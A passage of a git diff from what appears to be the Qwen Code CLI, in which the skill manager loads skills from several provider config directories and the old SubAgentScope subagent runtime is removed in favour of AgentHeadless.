expect(baseDir).toBe(path.join('/home/user', '.qwen', 'skills')); + expect(baseDirs).toHaveLength(2); + expect(baseDirs).toContain(path.join('/home/user', '.qwen', 'skills')); + expect(baseDirs).toContain(path.join('/home/user', '.agent', 'skills')); }); it('should return bundled-level base dir', () => { - const baseDir = manager.getSkillsBaseDir('bundled'); + const baseDirs = manager.getSkillsBaseDirs('bundled'); - expect(baseDir).toMatch(/skills[/\\]bundled$/); + expect(baseDirs[0]).toMatch(/skills[/\\]bundled$/); }); it('should throw for extension level', () => { - expect(() => manager.getSkillsBaseDir('extension')).toThrow( + expect(() => manager.getSkillsBaseDirs('extension')).toThrow( 'Extension skills do not have a base directory', ); }); diff --git a/packages/core/src/skills/skill-manager.ts b/packages/core/src/skills/skill-manager.ts index b6636a627..fbeb18b8d 100644 --- a/packages/core/src/skills/skill-manager.ts +++ b/packages/core/src/skills/skill-manager.ts @@ -22,6 +22,7 @@ import type { Config } from '../config/config.js'; import { validateConfig } from './skill-load.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import { normalizeContent } from '../utils/textUtils.js'; +import { SKILL_PROVIDER_CONFIG_DIRS } from '../config/storage.js'; const debugLogger = createDebugLogger('SKILL_MANAGER'); @@ -428,20 +429,20 @@ export class SkillManager { * Gets the base directory for skills at a specific level. * * @param level - Storage level - * @returns Absolute directory path + * @returns Absolute directory paths */ - getSkillsBaseDir(level: SkillLevel): string { + getSkillsBaseDirs(level: SkillLevel): string[] { switch (level) { case 'project': - return path.join( - this.config.getProjectRoot(), - QWEN_CONFIG_DIR, - SKILLS_CONFIG_DIR, + return SKILL_PROVIDER_CONFIG_DIRS.map((v) => + path.join(this.config.getProjectRoot(), v, SKILLS_CONFIG_DIR), ); case 'user': - return path.join(os.homedir(), QWEN_CONFIG_DIR, SKILLS_CONFIG_DIR); + return SKILL_PROVIDER_CONFIG_DIRS.map((v) => + path.join(os.homedir(), v, SKILLS_CONFIG_DIR), + ); case 'bundled': - return this.bundledSkillsDir; + return [this.bundledSkillsDir]; case 'extension': throw new Error( 'Extension skills do not have a base directory; they are loaded from active extensions.', @@ -499,9 +500,26 @@ export class SkillManager { return skills; } - const baseDir = this.getSkillsBaseDir(level); - debugLogger.debug(`Loading ${level} level skills from: ${baseDir}`); - const skills = await this.loadSkillsFromDir(baseDir, level); + // Iterate provider directories in PROVIDER_CONFIG_DIRS order. + // The first directory that contains a skill with a given name wins, + // so the order defines implicit precedence (.qwen > .agent > .cursor > ...). + const baseDirs = this.getSkillsBaseDirs(level); + const skills: SkillConfig[] = []; + const seenNames = new Set(); + for (const baseDir of baseDirs) { + debugLogger.debug(`Loading ${level} level skills from: ${baseDir}`); + const skillsFromDir = await this.loadSkillsFromDir(baseDir, level); + for (const skill of skillsFromDir) { + if (seenNames.has(skill.name)) { + debugLogger.debug( + `Skipping duplicate skill at ${level} level: ${skill.name} from ${baseDir}`, + ); + continue; + } + seenNames.add(skill.name); + skills.push(skill); + } + } debugLogger.debug(`Loaded ${skills.length} ${level} level skills`); return skills; } @@ -624,7 +642,8 @@ export class SkillManager { private updateWatchersFromCache(): void { const watchTargets = new Set( (['project', 'user'] as const) - .map((level) => this.getSkillsBaseDir(level)) + .map((level) => this.getSkillsBaseDirs(level)) + .reduce((acc, baseDirs) => acc.concat(baseDirs), []) .filter((baseDir) => fsSync.existsSync(baseDir)), ); @@ -680,7 +699,7 @@ export class SkillManager { } private async ensureUserSkillsDir(): Promise { - const baseDir = this.getSkillsBaseDir('user'); + const baseDir = path.join(os.homedir(), QWEN_CONFIG_DIR, SKILLS_CONFIG_DIR); try { await fs.mkdir(baseDir, { recursive: true }); } catch (error) { diff --git a/packages/core/src/subagents/index.ts b/packages/core/src/subagents/index.ts index 17c62a200..c05c38697 100644 --- a/packages/core/src/subagents/index.ts +++ b/packages/core/src/subagents/index.ts @@ -5,18 +5,11 @@ */ /** - * @fileoverview Subagents Phase 1 implementation - File-based configuration layer + * @fileoverview Subagents — file-based configuration layer. * * This module provides the foundation for the subagents feature by implementing - * a file-based configuration system that builds on the existing SubAgentScope - * runtime system. It includes: + * a file-based configuration system that builds on the agent runtime. * - * - Type definitions for file-based subagent configurations - * - Validation system for configuration integrity - * - Runtime conversion functions integrated into the manager - * - Manager class for CRUD operations on subagent files - * - * The implementation follows the Markdown + YAML frontmatter format , with storage at both project and user levels. */ // Core types and interfaces @@ -40,36 +33,3 @@ export { SubagentValidator } from './validation.js'; // Main management class export { SubagentManager } from './subagent-manager.js'; - -// Re-export existing runtime types for convenience -export type { - PromptConfig, - ModelConfig, - RunConfig, - ToolConfig, - SubagentTerminateMode, -} from './types.js'; - -export { SubAgentScope } from './subagent.js'; - -// Event system for UI integration -export type { - SubAgentEvent, - SubAgentStartEvent, - SubAgentRoundEvent, - SubAgentStreamTextEvent, - SubAgentUsageEvent, - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentFinishEvent, - SubAgentErrorEvent, - SubAgentApprovalRequestEvent, -} from './subagent-events.js'; - -export { SubAgentEventEmitter, SubAgentEventType } from './subagent-events.js'; - -// Statistics and formatting -export type { - SubagentStatsSummary, - ToolUsageStats, -} from './subagent-statistics.js'; diff --git a/packages/core/src/subagents/subagent-events.ts b/packages/core/src/subagents/subagent-events.ts deleted file mode 100644 index 5de09a3c2..000000000 --- a/packages/core/src/subagents/subagent-events.ts +++ /dev/null @@ -1,145 +0,0 @@ -/** - * @license - * Copyright 2025 Qwen - * SPDX-License-Identifier: Apache-2.0 - */ - -import { EventEmitter } from 'events'; -import type { - ToolCallConfirmationDetails, - ToolConfirmationOutcome, - ToolResultDisplay, -} from '../tools/tools.js'; -import type { Part, GenerateContentResponseUsageMetadata } from '@google/genai'; - -export type SubAgentEvent = - | 'start' - | 'round_start' - | 'round_end' - | 'stream_text' - | 'tool_call' - | 'tool_result' - | 'tool_waiting_approval' - | 'usage_metadata' - | 'finish' - | 'error'; - -export enum SubAgentEventType { - START = 'start', - ROUND_START = 'round_start', - ROUND_END = 'round_end', - STREAM_TEXT = 'stream_text', - TOOL_CALL = 'tool_call', - TOOL_RESULT = 'tool_result', - TOOL_WAITING_APPROVAL = 'tool_waiting_approval', - USAGE_METADATA = 'usage_metadata', - FINISH = 'finish', - ERROR = 'error', -} - -export interface SubAgentStartEvent { - subagentId: string; - name: string; - model?: string; - tools: string[]; - timestamp: number; -} - -export interface SubAgentRoundEvent { - subagentId: string; - round: number; - promptId: string; - timestamp: number; -} - -export interface SubAgentStreamTextEvent { - subagentId: string; - round: number; - text: string; - /** Whether this text is reasoning/thinking content (as opposed to regular output) */ - thought?: boolean; - timestamp: number; -} - -export interface SubAgentUsageEvent { - subagentId: string; - round: number; - usage: GenerateContentResponseUsageMetadata; - durationMs?: number; - timestamp: number; -} - -export interface SubAgentToolCallEvent { - subagentId: string; - round: number; - callId: string; - name: string; - args: Record; - description: string; - timestamp: number; -} - -export interface SubAgentToolResultEvent { - subagentId: string; - round: number; - callId: string; - name: string; - success: boolean; - error?: string; - responseParts?: Part[]; - resultDisplay?: ToolResultDisplay; - durationMs?: number; - timestamp: number; -} - -export interface SubAgentApprovalRequestEvent { - subagentId: string; - round: number; - callId: string; - name: string; - description: string; - confirmationDetails: Omit & { - type: ToolCallConfirmationDetails['type']; - }; - respond: ( - outcome: ToolConfirmationOutcome, - payload?: Parameters[1], - ) => Promise; - timestamp: number; -} - -export interface SubAgentFinishEvent { - subagentId: string; - terminateReason: string; - timestamp: number; - rounds?: number; - totalDurationMs?: number; - totalToolCalls?: number; - successfulToolCalls?: number; - failedToolCalls?: number; - inputTokens?: number; - outputTokens?: number; - totalTokens?: number; -} - -export interface SubAgentErrorEvent { - subagentId: string; - error: string; - timestamp: number; -} - -export class SubAgentEventEmitter { - private ee = new EventEmitter(); - - on(event: SubAgentEvent, listener: (...args: unknown[]) => void) { - this.ee.on(event, listener); - } - - off(event: SubAgentEvent, listener: (...args: unknown[]) => void) { - this.ee.off(event, listener); - } - - emit(event: SubAgentEvent, payload: unknown) { - this.ee.emit(event, payload); - } -} diff --git a/packages/core/src/subagents/subagent-hooks.ts b/packages/core/src/subagents/subagent-hooks.ts deleted file mode 100644 index f3bf997bf..000000000 --- a/packages/core/src/subagents/subagent-hooks.ts +++ /dev/null @@ -1,33 +0,0 @@ -/** - * @license - * Copyright 2025 Qwen - * SPDX-License-Identifier: Apache-2.0 - */ - -export interface PreToolUsePayload { - subagentId: string; - name: string; // subagent name - toolName: string; - args: Record; - timestamp: number; -} - -export interface PostToolUsePayload extends PreToolUsePayload { - success: boolean; - durationMs: number; - errorMessage?: string; -} - -export interface SubagentStopPayload { - subagentId: string; - name: string; // subagent name - terminateReason: string; - summary: Record; - timestamp: number; -} - -export interface SubagentHooks { - preToolUse?(payload: PreToolUsePayload): Promise | void; - postToolUse?(payload: PostToolUsePayload): Promise | void; - onStop?(payload: SubagentStopPayload): Promise | void; -} diff --git a/packages/core/src/subagents/subagent-manager.ts b/packages/core/src/subagents/subagent-manager.ts index 0552fa60c..21ad85129 100644 --- a/packages/core/src/subagents/subagent-manager.ts +++ b/packages/core/src/subagents/subagent-manager.ts @@ -19,14 +19,20 @@ import type { SubagentLevel, ListSubagentsOptions, CreateSubagentOptions, +} from './types.js'; +import type { PromptConfig, ModelConfig, RunConfig, ToolConfig, -} from './types.js'; +} from '../agents/runtime/agent-types.js'; import { SubagentError, SubagentErrorCode } from './types.js'; import { SubagentValidator } from './validation.js'; -import { SubAgentScope } from './subagent.js'; +import { AgentHeadless } from '../agents/runtime/agent-headless.js'; +import type { + AgentEventEmitter, + AgentHooks, +} from '../agents/runtime/agent-events.js'; import type { Config } from '../config/config.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import { normalizeContent } from '../utils/textUtils.js'; @@ -579,24 +585,24 @@ export class SubagentManager { } /** - * Creates a SubAgentScope from a subagent configuration. + * Creates an AgentHeadless from a subagent configuration. * * @param config - Subagent configuration * @param runtimeContext - Runtime context - * @returns Promise resolving to SubAgentScope + * @returns Promise resolving to AgentHeadless */ - async createSubagentScope( + async createAgentHeadless( config: SubagentConfig, runtimeContext: Config, options?: { - eventEmitter?: import('./subagent-events.js').SubAgentEventEmitter; - hooks?: import('./subagent-hooks.js').SubagentHooks; + eventEmitter?: AgentEventEmitter; + hooks?: AgentHooks; }, - ): Promise { + ): Promise { try { const runtimeConfig = this.convertToRuntimeConfig(config); - return await SubAgentScope.create( + return await AgentHeadless.create( config.name, runtimeContext, runtimeConfig.promptConfig, @@ -609,7 +615,7 @@ export class SubagentManager { } catch (error) { if (error instanceof Error) { throw new SubagentError( - `Failed to create SubAgentScope: ${error.message}`, + `Failed to create AgentHeadless: ${error.message}`, SubagentErrorCode.INVALID_CONFIG, config.name, ); @@ -620,10 +626,10 @@ export class SubagentManager { /** * Converts a file-based SubagentConfig to runtime configuration - * compatible with SubAgentScope.create(). + * compatible with AgentHeadless.create(). * * @param config - File-based subagent configuration - * @returns Runtime configuration for SubAgentScope + * @returns Runtime configuration for AgentHeadless */ convertToRuntimeConfig(config: SubagentConfig): SubagentRuntimeConfig { // Build prompt configuration diff --git a/packages/core/src/subagents/subagent.ts b/packages/core/src/subagents/subagent.ts deleted file mode 100644 index 613bc8044..000000000 --- a/packages/core/src/subagents/subagent.ts +++ /dev/null @@ -1,1010 +0,0 @@ -/** - * @license - * Copyright 2025 Qwen - * SPDX-License-Identifier: Apache-2.0 - */ - -import { reportError } from '../utils/errorReporting.js'; -import type { Config } from '../config/config.js'; -import { createDebugLogger } from '../utils/debugLogger.js'; - -const debugLogger = createDebugLogger('SUBAGENT'); -import { type ToolCallRequestInfo } from '../core/turn.js'; -import { - CoreToolScheduler, - type ToolCall, - type WaitingToolCall, -} from '../core/coreToolScheduler.js'; -import type { - ToolConfirmationOutcome, - ToolCallConfirmationDetails, -} from '../tools/tools.js'; -import { getInitialChatHistory } from '../utils/environmentContext.js'; -import type { - Content, - Part, - FunctionCall, - GenerateContentConfig, - FunctionDeclaration, - GenerateContentResponseUsageMetadata, -} from '@google/genai'; -import { GeminiChat } from '../core/geminiChat.js'; -import type { - PromptConfig, - ModelConfig, - RunConfig, - ToolConfig, -} from './types.js'; -import { SubagentTerminateMode } from './types.js'; -import type { - SubAgentFinishEvent, - SubAgentRoundEvent, - SubAgentStartEvent, - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentErrorEvent, - SubAgentUsageEvent, -} from './subagent-events.js'; -import { - type SubAgentEventEmitter, - SubAgentEventType, -} from './subagent-events.js'; -import { - SubagentStatistics, - type SubagentStatsSummary, -} from './subagent-statistics.js'; -import type { SubagentHooks } from './subagent-hooks.js'; -import { logSubagentExecution } from '../telemetry/loggers.js'; -import { SubagentExecutionEvent } from '../telemetry/types.js'; -import { TaskTool } from '../tools/task.js'; -import { DEFAULT_QWEN_MODEL } from '../config/models.js'; - -/** - * @fileoverview Defines the configuration interfaces for a subagent. - * - * These interfaces specify the structure for defining the subagent's prompt, - * the model parameters, and the execution settings. - */ - -interface ExecutionStats { - startTimeMs: number; - totalDurationMs: number; - rounds: number; - totalToolCalls: number; - successfulToolCalls: number; - failedToolCalls: number; - inputTokens?: number; - outputTokens?: number; - totalTokens?: number; - estimatedCost?: number; -} - -/** - * Manages the runtime context state for the subagent. - * This class provides a mechanism to store and retrieve key-value pairs - * that represent the dynamic state and variables accessible to the subagent - * during its execution. - */ -export class ContextState { - private state: Record = {}; - - /** - * Retrieves a value from the context state. - * - * @param key - The key of the value to retrieve. - * @returns The value associated with the key, or undefined if the key is not found. - */ - get(key: string): unknown { - return this.state[key]; - } - - /** - * Sets a value in the context state. - * - * @param key - The key to set the value under. - * @param value - The value to set. - */ - set(key: string, value: unknown): void { - this.state[key] = value; - } - - /** - * Retrieves all keys in the context state. - * - * @returns An array of all keys in the context state. - */ - get_keys(): string[] { - return Object.keys(this.state); - } -} - -/** - * Replaces `${...}` placeholders in a template string with values from a context. - * - * This function identifies all placeholders in the format `${key}`, validates that - * each key exists in the provided `ContextState`, and then performs the substitution. - * - * @param template The template string containing placeholders. - * @param context The `ContextState` object providing placeholder values. - * @returns The populated string with all placeholders replaced. - * @throws {Error} if any placeholder key is not found in the context. - */ -function templateString(template: string, context: ContextState): string { - const placeholderRegex = /\$\{(\w+)\}/g; - - // First, find all unique keys required by the template. - const requiredKeys = new Set( - Array.from(template.matchAll(placeholderRegex), (match) => match[1]), - ); - - // Check if all required keys exist in the context. - const contextKeys = new Set(context.get_keys()); - const missingKeys = Array.from(requiredKeys).filter( - (key) => !contextKeys.has(key), - ); - - if (missingKeys.length > 0) { - throw new Error( - `Missing context values for the following keys: ${missingKeys.join( - ', ', - )}`, - ); - } - - // Perform the replacement using a replacer function. - return template.replace(placeholderRegex, (_match, key) => - String(context.get(key)), - ); -} - -/** - * Represents the scope and execution environment for a subagent. - * This class orchestrates the subagent's lifecycle, managing its chat interactions, - * runtime context, and the collection of its outputs. - */ -export class SubAgentScope { - executionStats: ExecutionStats = { - startTimeMs: 0, - totalDurationMs: 0, - rounds: 0, - totalToolCalls: 0, - successfulToolCalls: 0, - failedToolCalls: 0, - inputTokens: 0, - outputTokens: 0, - totalTokens: 0, - estimatedCost: 0, - }; - private toolUsage = new Map< - string, - { - count: number; - success: number; - failure: number; - lastError?: string; - totalDurationMs?: number; - averageDurationMs?: number; - } - >(); - private eventEmitter?: SubAgentEventEmitter; - private finalText: string = ''; - private terminateMode: SubagentTerminateMode = SubagentTerminateMode.ERROR; - private readonly stats = new SubagentStatistics(); - private hooks?: SubagentHooks; - private readonly subagentId: string; - - /** - * Constructs a new SubAgentScope instance. - * @param name - The name for the subagent, used for logging and identification. - * @param runtimeContext - The shared runtime configuration and services. - * @param promptConfig - Configuration for the subagent's prompt and behavior. - * @param modelConfig - Configuration for the generative model parameters. - * @param runConfig - Configuration for the subagent's execution environment. - * @param toolConfig - Optional configuration for tools available to the subagent. - */ - private constructor( - readonly name: string, - readonly runtimeContext: Config, - private readonly promptConfig: PromptConfig, - private readonly modelConfig: ModelConfig, - private readonly runConfig: RunConfig, - private readonly toolConfig?: ToolConfig, - eventEmitter?: SubAgentEventEmitter, - hooks?: SubagentHooks, - ) { - const randomPart = Math.random().toString(36).slice(2, 8); - this.subagentId = `${this.name}-${randomPart}`; - this.eventEmitter = eventEmitter; - this.hooks = hooks; - } - - /** - * Creates and validates a new SubAgentScope instance. - * This factory method ensures that all tools provided in the prompt configuration - * are valid for non-interactive use before creating the subagent instance. - * @param {string} name - The name of the subagent. - * @param {Config} runtimeContext - The shared runtime configuration and services. - * @param {PromptConfig} promptConfig - Configuration for the subagent's prompt and behavior. - * @param {ModelConfig} modelConfig - Configuration for the generative model parameters. - * @param {RunConfig} runConfig - Configuration for the subagent's execution environment. - * @param {ToolConfig} [toolConfig] - Optional configuration for tools. - * @returns {Promise} A promise that resolves to a valid SubAgentScope instance. - * @throws {Error} If any tool requires user confirmation. - */ - static async create( - name: string, - runtimeContext: Config, - promptConfig: PromptConfig, - modelConfig: ModelConfig, - runConfig: RunConfig, - toolConfig?: ToolConfig, - eventEmitter?: SubAgentEventEmitter, - hooks?: SubagentHooks, - ): Promise { - return new SubAgentScope( - name, - runtimeContext, - promptConfig, - modelConfig, - runConfig, - toolConfig, - eventEmitter, - hooks, - ); - } - - /** - * Runs the subagent in a non-interactive mode. - * This method orchestrates the subagent's execution loop, including prompt templating, - * tool execution, and termination conditions. - * @param {ContextState} context - The current context state containing variables for prompt templating. - * @returns {Promise} A promise that resolves when the subagent has completed its execution. - */ - async runNonInteractive( - context: ContextState, - externalSignal?: AbortSignal, - ): Promise { - const chat = await this.createChatObject(context); - - if (!chat) { - this.terminateMode = SubagentTerminateMode.ERROR; - return; - } - - // Track the current round's AbortController for external signal propagation - let currentRoundAbortController: AbortController | null = null; - const onExternalAbort = () => { - currentRoundAbortController?.abort(); - }; - if (externalSignal) { - externalSignal.addEventListener('abort', onExternalAbort); - } - - const toolRegistry = this.runtimeContext.getToolRegistry(); - - // Prepare the list of tools available to the subagent. - // If no explicit toolConfig or it contains "*" or is empty, inherit all tools. - const toolsList: FunctionDeclaration[] = []; - if (this.toolConfig) { - const asStrings = this.toolConfig.tools.filter( - (t): t is string => typeof t === 'string', - ); - const hasWildcard = asStrings.includes('*'); - const onlyInlineDecls = this.toolConfig.tools.filter( - (t): t is FunctionDeclaration => typeof t !== 'string', - ); - - if (hasWildcard || asStrings.length === 0) { - toolsList.push( - ...toolRegistry - .getFunctionDeclarations() - .filter((t) => t.name !== TaskTool.Name), - ); - } else { - toolsList.push( - ...toolRegistry.getFunctionDeclarationsFiltered(asStrings), - ); - } - toolsList.push(...onlyInlineDecls); - } else { - // Inherit all available tools by default when not specified. - toolsList.push( - ...toolRegistry - .getFunctionDeclarations() - .filter((t) => t.name !== TaskTool.Name), - ); - } - - const initialTaskText = String( - (context.get('task_prompt') as string) ?? 'Get Started!', - ); - let currentMessages: Content[] = [ - { role: 'user', parts: [{ text: initialTaskText }] }, - ]; - - const startTime = Date.now(); - this.executionStats.startTimeMs = startTime; - this.stats.start(startTime); - let turnCounter = 0; - try { - // Emit start event - this.eventEmitter?.emit(SubAgentEventType.START, { - subagentId: this.subagentId, - name: this.name, - model: - this.modelConfig.model || - this.runtimeContext.getModel() || - DEFAULT_QWEN_MODEL, - tools: (this.toolConfig?.tools || ['*']).map((t) => - typeof t === 'string' ? t : t.name, - ), - timestamp: Date.now(), - } as SubAgentStartEvent); - - // Log telemetry for subagent start - const startEvent = new SubagentExecutionEvent(this.name, 'started'); - logSubagentExecution(this.runtimeContext, startEvent); - while (true) { - // Create a new AbortController for each round to avoid listener accumulation - const roundAbortController = new AbortController(); - currentRoundAbortController = roundAbortController; - - // If external signal already aborted, cancel immediately - if (externalSignal?.aborted) { - roundAbortController.abort(); - } - - // Check termination conditions. - if ( - this.runConfig.max_turns && - turnCounter >= this.runConfig.max_turns - ) { - this.terminateMode = SubagentTerminateMode.MAX_TURNS; - break; - } - let durationMin = (Date.now() - startTime) / (1000 * 60); - if ( - this.runConfig.max_time_minutes && - durationMin >= this.runConfig.max_time_minutes - ) { - this.terminateMode = SubagentTerminateMode.TIMEOUT; - break; - } - - const promptId = `${this.runtimeContext.getSessionId()}#${this.subagentId}#${turnCounter++}`; - - const messageParams = { - message: currentMessages[0]?.parts || [], - config: { - abortSignal: roundAbortController.signal, - tools: [{ functionDeclarations: toolsList }], - }, - }; - - const roundStreamStart = Date.now(); - const responseStream = await chat.sendMessageStream( - this.modelConfig.model || - this.runtimeContext.getModel() || - DEFAULT_QWEN_MODEL, - messageParams, - promptId, - ); - this.eventEmitter?.emit(SubAgentEventType.ROUND_START, { - subagentId: this.subagentId, - round: turnCounter, - promptId, - timestamp: Date.now(), - } as SubAgentRoundEvent); - - const functionCalls: FunctionCall[] = []; - let roundText = ''; - let lastUsage: GenerateContentResponseUsageMetadata | undefined = - undefined; - let currentResponseId: string | undefined = undefined; - for await (const streamEvent of responseStream) { - if (roundAbortController.signal.aborted) { - this.terminateMode = SubagentTerminateMode.CANCELLED; - return; - } - - // Handle retry events - if (streamEvent.type === 'retry') { - continue; - } - - // Handle chunk events - if (streamEvent.type === 'chunk') { - const resp = streamEvent.value; - // Track the response ID for tool call correlation - if (resp.responseId) { - currentResponseId = resp.responseId; - } - if (resp.functionCalls) functionCalls.push(...resp.functionCalls); - const content = resp.candidates?.[0]?.content; - const parts = content?.parts || []; - for (const p of parts) { - const txt = p.text; - const isThought = p.thought ?? false; - if (txt && !isThought) roundText += txt; - if (txt) - this.eventEmitter?.emit(SubAgentEventType.STREAM_TEXT, { - subagentId: this.subagentId, - round: turnCounter, - text: txt, - thought: isThought, - timestamp: Date.now(), - }); - } - if (resp.usageMetadata) lastUsage = resp.usageMetadata; - } - } - this.executionStats.rounds = turnCounter; - this.stats.setRounds(turnCounter); - - durationMin = (Date.now() - startTime) / (1000 * 60); - if ( - this.runConfig.max_time_minutes && - durationMin >= this.runConfig.max_time_minutes - ) { - this.terminateMode = SubagentTerminateMode.TIMEOUT; - break; - } - - // Update token usage if available - if (lastUsage) { - const inTok = Number(lastUsage.promptTokenCount || 0); - const outTok = Number(lastUsage.candidatesTokenCount || 0); - const thoughtTok = Number(lastUsage.thoughtsTokenCount || 0); - const cachedTok = Number(lastUsage.cachedContentTokenCount || 0); - if ( - isFinite(inTok) || - isFinite(outTok) || - isFinite(thoughtTok) || - isFinite(cachedTok) - ) { - this.stats.recordTokens( - isFinite(inTok) ? inTok : 0, - isFinite(outTok) ? outTok : 0, - isFinite(thoughtTok) ? thoughtTok : 0, - isFinite(cachedTok) ? cachedTok : 0, - ); - // mirror legacy fields for compatibility - this.executionStats.inputTokens = - (this.executionStats.inputTokens || 0) + - (isFinite(inTok) ? inTok : 0); - this.executionStats.outputTokens = - (this.executionStats.outputTokens || 0) + - (isFinite(outTok) ? outTok : 0); - this.executionStats.totalTokens = - (this.executionStats.inputTokens || 0) + - (this.executionStats.outputTokens || 0) + - (isFinite(thoughtTok) ? thoughtTok : 0) + - (isFinite(cachedTok) ? cachedTok : 0); - this.executionStats.estimatedCost = - (this.executionStats.inputTokens || 0) * 3e-5 + - (this.executionStats.outputTokens || 0) * 6e-5; - } - this.eventEmitter?.emit(SubAgentEventType.USAGE_METADATA, { - subagentId: this.subagentId, - round: turnCounter, - usage: lastUsage, - durationMs: Date.now() - roundStreamStart, - timestamp: Date.now(), - } as SubAgentUsageEvent); - } - - if (functionCalls.length > 0) { - currentMessages = await this.processFunctionCalls( - functionCalls, - roundAbortController, - promptId, - turnCounter, - toolsList, - currentResponseId, - ); - } else { - // No tool calls — treat this as the model's final answer. - if (roundText && roundText.trim().length > 0) { - this.finalText = roundText.trim(); - this.terminateMode = SubagentTerminateMode.GOAL; - break; - } - // Otherwise, nudge the model to finalize a result. - currentMessages = [ - { - role: 'user', - parts: [ - { - text: 'Please provide the final result now and stop calling tools.', - }, - ], - }, - ]; - } - this.eventEmitter?.emit(SubAgentEventType.ROUND_END, { - subagentId: this.subagentId, - round: turnCounter, - promptId, - timestamp: Date.now(), - } as SubAgentRoundEvent); - } - } catch (error) { - debugLogger.error('Error during subagent execution:', error); - this.terminateMode = SubagentTerminateMode.ERROR; - this.eventEmitter?.emit(SubAgentEventType.ERROR, { - subagentId: this.subagentId, - error: error instanceof Error ? error.message : String(error), - timestamp: Date.now(), - } as SubAgentErrorEvent); - - throw error; - } finally { - if (externalSignal) { - externalSignal.removeEventListener('abort', onExternalAbort); - } - // Clear the reference to allow GC - currentRoundAbortController = null; - this.executionStats.totalDurationMs = Date.now() - startTime; - const summary = this.stats.getSummary(Date.now()); - this.eventEmitter?.emit(SubAgentEventType.FINISH, { - subagentId: this.subagentId, - terminateReason: this.terminateMode, - timestamp: Date.now(), - rounds: summary.rounds, - totalDurationMs: summary.totalDurationMs, - totalToolCalls: summary.totalToolCalls, - successfulToolCalls: summary.successfulToolCalls, - failedToolCalls: summary.failedToolCalls, - inputTokens: summary.inputTokens, - outputTokens: summary.outputTokens, - totalTokens: summary.totalTokens, - } as SubAgentFinishEvent); - - const completionEvent = new SubagentExecutionEvent( - this.name, - this.terminateMode === SubagentTerminateMode.GOAL - ? 'completed' - : 'failed', - { - terminate_reason: this.terminateMode, - result: this.finalText, - execution_summary: this.stats.formatCompact( - 'Subagent execution completed', - ), - }, - ); - logSubagentExecution(this.runtimeContext, completionEvent); - - await this.hooks?.onStop?.({ - subagentId: this.subagentId, - name: this.name, - terminateReason: this.terminateMode, - summary: summary as unknown as Record, - timestamp: Date.now(), - }); - } - } - - /** - * Processes a list of function calls, executing each one and collecting their responses. - * This method iterates through the provided function calls, executes them using the - * `executeToolCall` function (or handles `self.emitvalue` internally), and aggregates - * their results. It also manages error reporting for failed tool executions. - * @param {FunctionCall[]} functionCalls - An array of `FunctionCall` objects to process. - * @param {ToolRegistry} toolRegistry - The tool registry to look up and execute tools. - * @param {AbortController} abortController - An `AbortController` to signal cancellation of tool executions. - * @param {string} responseId - Optional API response ID for correlation with tool calls. - * @returns {Promise} A promise that resolves to an array of `Content` parts representing the tool responses, - * which are then used to update the chat history. - */ - private async processFunctionCalls( - functionCalls: FunctionCall[], - abortController: AbortController, - promptId: string, - currentRound: number, - toolsList: FunctionDeclaration[], - responseId?: string, - ): Promise { - const toolResponseParts: Part[] = []; - - // Build allowed tool names set for filtering - const allowedToolNames = new Set(toolsList.map((t) => t.name)); - - // Filter unauthorized tool calls before scheduling - const authorizedCalls: FunctionCall[] = []; - for (const fc of functionCalls) { - const callId = fc.id ?? `${fc.name}-${Date.now()}`; - - if (!allowedToolNames.has(fc.name)) { - const toolName = String(fc.name); - const errorMessage = `Tool "${toolName}" not found. Tools must use the exact names provided.`; - - // Emit TOOL_CALL event for visibility - this.eventEmitter?.emit(SubAgentEventType.TOOL_CALL, { - subagentId: this.subagentId, - round: currentRound, - callId, - name: toolName, - args: fc.args ?? {}, - description: `Tool "${toolName}" not found`, - timestamp: Date.now(), - } as SubAgentToolCallEvent); - - // Build function response part (used for both event and LLM) - const functionResponsePart = { - functionResponse: { - id: callId, - name: toolName, - response: { error: errorMessage }, - }, - }; - - // Emit TOOL_RESULT event with error (include responseParts for UI rendering) - this.eventEmitter?.emit(SubAgentEventType.TOOL_RESULT, { - subagentId: this.subagentId, - round: currentRound, - callId, - name: toolName, - success: false, - error: errorMessage, - responseParts: [functionResponsePart], - resultDisplay: errorMessage, - durationMs: 0, - timestamp: Date.now(), - } as SubAgentToolResultEvent); - - // Record blocked tool call in stats - this.recordToolCallStats(toolName, false, 0, errorMessage); - - // Add function response for LLM - toolResponseParts.push(functionResponsePart); - continue; - } - authorizedCalls.push(fc); - } - - // Build scheduler - const responded = new Set(); - let resolveBatch: (() => void) | null = null; - const scheduler = new CoreToolScheduler({ - config: this.runtimeContext, - outputUpdateHandler: undefined, - onAllToolCallsComplete: async (completedCalls) => { - for (const call of completedCalls) { - const toolName = call.request.name; - const duration = call.durationMs ?? 0; - const success = call.status === 'success'; - const errorMessage = - call.status === 'error' || call.status === 'cancelled' - ? call.response.error?.message - : undefined; - - // Record stats - this.recordToolCallStats(toolName, success, duration, errorMessage); - - // Emit tool result event - this.eventEmitter?.emit(SubAgentEventType.TOOL_RESULT, { - subagentId: this.subagentId, - round: currentRound, - callId: call.request.callId, - name: toolName, - success, - error: errorMessage, - responseParts: call.response.responseParts, - resultDisplay: call.response.resultDisplay - ? typeof call.response.resultDisplay === 'string' - ? call.response.resultDisplay - : JSON.stringify(call.response.resultDisplay) - : undefined, - durationMs: duration, - timestamp: Date.now(), - } as SubAgentToolResultEvent); - - // post-tool hook - await this.hooks?.postToolUse?.({ - subagentId: this.subagentId, - name: this.name, - toolName, - args: call.request.args, - success, - durationMs: duration, - errorMessage, - timestamp: Date.now(), - }); - - // Append response parts - const respParts = call.response.responseParts; - if (respParts) { - const parts = Array.isArray(respParts) ? respParts : [respParts]; - for (const part of parts) { - if (typeof part === 'string') { - toolResponseParts.push({ text: part }); - } else if (part) { - toolResponseParts.push(part); - } - } - } - } - // Signal that this batch is complete (all tools terminal) - resolveBatch?.(); - }, - onToolCallsUpdate: (calls: ToolCall[]) => { - for (const call of calls) { - if (call.status !== 'awaiting_approval') continue; - const waiting = call as WaitingToolCall; - - // Emit approval request event for UI visibility - try { - const { confirmationDetails } = waiting; - const { onConfirm: _onConfirm, ...rest } = confirmationDetails; - this.eventEmitter?.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, { - subagentId: this.subagentId, - round: currentRound, - callId: waiting.request.callId, - name: waiting.request.name, - description: this.getToolDescription( - waiting.request.name, - waiting.request.args, - ), - confirmationDetails: rest, - respond: async ( - outcome: ToolConfirmationOutcome, - payload?: Parameters< - 